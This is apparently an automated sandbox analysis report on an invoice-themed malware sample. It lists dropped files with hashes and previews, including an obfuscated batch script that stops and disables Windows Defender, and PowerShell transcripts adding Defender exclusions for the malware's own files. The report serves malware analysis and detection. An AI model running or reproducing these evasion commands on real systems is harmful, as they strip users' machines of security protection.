                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                                                                                            MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                                                                            SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                                                                                            SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                                                                                            SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                            • Filename: PurchaseOrdersCSTtyres004786587.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: 3zKVfxhs18.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: AWB783079370872.docm, Detection: malicious, Browse
                                                                                                                                                            • Filename: DETALLE DE TRANSFERENCIA BANCO AGRARO DE COLOMBIA.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: CN-Invoice-XXXXX9808-19011143287990.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: Payment Advice 170221.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: Payment Receipt.jar, Detection: malicious, Browse
                                                                                                                                                            • Filename: miner.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: 875666665.xlsm.xlsm, Detection: malicious, Browse
                                                                                                                                                            • Filename: DOCX.doc.doc, Detection: malicious, Browse
                                                                                                                                                            • Filename: v.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: uaa.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: r.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: j.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: 99.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: m.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: n.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: DdV1LG7bLJ.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: TBN HMX SPECS.xlsm, Detection: malicious, Browse
                                                                                                                                                            • Filename: VESSEL CONTACT DETAILS, LOAD & DISPORT.doc, Detection: malicious, Browse
                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\test.bat
                                                                                                                                                            Process:C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe
                                                                                                                                                            File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                            Category:modified
                                                                                                                                                            Size (bytes):8399
                                                                                                                                                            Entropy (8bit):4.665734428420432
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                                                                                            MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                                                                                            SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                                                                                            SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                                                                                            SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\1cc51949-2752-4134-b6cf-961241419db1\AdvancedRun.exe
                                                                                                                                                            Process:C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):91000
                                                                                                                                                            Entropy (8bit):6.241345766746317
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                                                                                            MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                                                                            SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                                                                                            SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                                                                                            SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\1cc51949-2752-4134-b6cf-961241419db1\test.bat
                                                                                                                                                            Process:C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe
                                                                                                                                                            File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8399
                                                                                                                                                            Entropy (8bit):4.665734428420432
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                                                                                            MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                                                                                            SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                                                                                            SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                                                                                            SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gccbelfa.ghx.ps1
                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1
                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: 1
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h2nvm502.qyi.psm1
                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1
                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: 1
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hkti2vm4.tb4.ps1
                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1
                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: 1
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sw14s2mf.ya1.psm1
                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1
                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: 1
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\AdvancedRun.exe
                                                                                                                                                            Process:C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):91000
                                                                                                                                                            Entropy (8bit):6.241345766746317
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                                                                                            MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                                                                            SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                                                                                            SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                                                                                            SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\test.bat
                                                                                                                                                            Process:C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe
                                                                                                                                                            File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8399
                                                                                                                                                            Entropy (8bit):4.665734428420432
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                                                                                            MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                                                                                            SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                                                                                            SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                                                                                            SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                                                                                            C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\catalog.dat
                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):232
                                                                                                                                                            Entropy (8bit):7.024371743172393
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:X4LDAnybgCFcpJSQwP4d7ZrqJgTFwoaw+9XU4:X4LEnybgCFCtvd7ZrCgpwoaw+Z9
                                                                                                                                                            MD5:32D0AAE13696FF7F8AF33B2D22451028
                                                                                                                                                            SHA1:EF80C4E0DB2AE8EF288027C9D3518E6950B583A4
                                                                                                                                                            SHA-256:5347661365E7AD2C1ACC27AB0D150FFA097D9246BB3626FCA06989E976E8DD29
                                                                                                                                                            SHA-512:1D77FC13512C0DBC4EFD7A66ACB502481E4EFA0FB73D0C7D0942448A72B9B05BA1EA78DDF0BE966363C2E3122E0B631DB7630D044D08C1E1D32B9FB025C356A5
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.
                                                                                                                                                            C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8
                                                                                                                                                            Entropy (8bit):2.75
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:KlC:KlC
                                                                                                                                                            MD5:204A8C77A1EDD9D15835E0795675E4C0
                                                                                                                                                            SHA1:9CDB9CE62C195B5E2C3AFE4EB31530F6BB872ABC
                                                                                                                                                            SHA-256:290483F25B571CCD06B717B23E0C8A27E760D549E30AECD2297973B845590AD4
                                                                                                                                                            SHA-512:97A1E46E222A40B394B053E599D48CA50AF1DF97E3D124DD03538D12B636FFA0A796DCF1F8DC313C4AFB207EB1A583347D683C92B56DC879F3299F76CF4D8ACC
                                                                                                                                                            Malicious:true
                                                                                                                                                            Preview: ....H..H
                                                                                                                                                            C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\storage.dat
                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):327432
                                                                                                                                                            Entropy (8bit):7.99938831605763
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:6144:oX44S90aTiB66x3Pl6nGV4bfD6wXPIZ9iBj0UeprGm2d7Tm:LkjYGsfGUc9iB4UeprKdnm
                                                                                                                                                            MD5:7E8F4A764B981D5B82D1CC49D341E9C6
                                                                                                                                                            SHA1:D9F0685A028FB219E1A6286AEFB7D6FCFC778B85
                                                                                                                                                            SHA-256:0BD3AAC12623520C4E2031C8B96B4A154702F36F97F643158E91E987D317B480
                                                                                                                                                            SHA-512:880E46504FCFB4B15B86B9D8087BA88E6C4950E433616EBB637799F42B081ABF6F07508943ECB1F786B2A89E751F5AE62D750BDCFFDDF535D600CF66EC44E926
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: pT..!..W..G.J..a.).@.i..wpK.so@...5.=.^..Q.oy.=e@9.B...F..09u"3.. 0t..RDn_4d.....E...i......~...|..fX_...Xf.p^......>a..$...e.6:7d.(a.A...=.)*.....{B.[...y%.*..i.Q.<..xt.X..H.. ..HF7g...I.*3.{.n....L.y;i..s-....(5i...........J.5b7}..fK..HV..,...0.... ....n.w6PMl.......v."".v.......#..X.a....../...cC...i..l{>5n.._+.e.d'...}...[..../...D.t..GVp.zz......(...o......b...+`J.{....hS1G.^*I..v&.jm.#u..1..Mg!.E..U.T.....6.2>...6.l.K.w"o..E..."K%{....z.7....<...,....]t.:.....[.Z.u...3X8.QI..j_.&..N..q.e.2...6.R.~..9.Bq..A.v.6.G..#y.....O....Z)G...w..E..k(....+..O..........Vg.2xC......O...jc.....z..~.P...q../.-.'.h.._.cj.=..B.x.Q9.pu.|i4...i...;O...n.?.,. ....v?.5}.OY@.dG|<.._[.69@.2..m..I..oP=...xrK.?............b..5....i&...l.c\b}..Q..O+.V.mJ.....pz....>F.......H...6$...d...|m...N..1.R..B.i..........$....$........CY}..$....r.....H...8...li.....7 P......?h....R.iF..6...q(.@LI.s..+K.....?m..H....*. l..&<}....`|.B....3.....I..o...u1..8i=.z.W..7
                                                                                                                                                            C:\Users\user\Documents\20210222\PowerShell_transcript.138727.gLFcjFHw.20210222074542.txt
                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1602
                                                                                                                                                            Entropy (8bit):5.3871208811732245
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:BZfv/EoO+SmFvqDYB1ZNm3Z6v/EoO+SmFvqDYB1ZA:BZ3/EN0VqDo1Zc3Zm/EN0VqDo1ZA
                                                                                                                                                            MD5:D214FCFF7A908A665304A0CCFB48FAAE
                                                                                                                                                            SHA1:AB734373D2E75D98767DE27FBEA9DA097DFD9D9C
                                                                                                                                                            SHA-256:654D84F927F7EDACE9D05BAA446FB351B99A0FF2BFF514AAAC6AF0F7CE1D1FE7
                                                                                                                                                            SHA-512:A56F15092553F2012D3C8EBE2B72C06765311AF0C06AA2C05859A7B644F9FBFDE830C6A5071F2D3924367BABCF24969E9ECEF97BBA77D6AB4E5B61B55FD81EF4
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20210222074612..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 138727 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe -Force..Process ID: 6496..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210222074612..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210222074930..Username: DES
                                                                                                                                                            C:\Users\user\Documents\20210222\PowerShell_transcript.138727.qwyL+J44.20210222074529.txt
                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):5887
                                                                                                                                                            Entropy (8bit):5.4334456255694334
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:BZo/ENFqDo1ZFZp/ENFqDo1ZTEq8jZ2/ENFqDo1ZMdMM+Zp:L
                                                                                                                                                            MD5:274E43453E3E88555157553FE6D0202B
                                                                                                                                                            SHA1:DF744448D16DF272AF8857B4A78614518E35B48F
                                                                                                                                                            SHA-256:C457120A2A84A04022230A207CC32A1A900E7373C714A5FB86787FC1532138C7
                                                                                                                                                            SHA-512:4D3B043CAADAEB1F9368239D53DC5AC3857BE0B1DF49F81B3FD29C1A89AB4B0158A99A96C816B1608F066FD327D3FE27F22BC29449F31B142868400B049E0D5B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20210222074543..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 138727 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe -Force..Process ID: 1552..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210222074544..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210222074917..Username: DESKTOP
                                                                                                                                                            C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):55
                                                                                                                                                            Entropy (8bit):4.306461250274409
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                                                            Static File Info

                                                                                                                                                            General

                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                            Entropy (8bit):5.522318927512162
                                                                                                                                                            TrID:
                                                                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
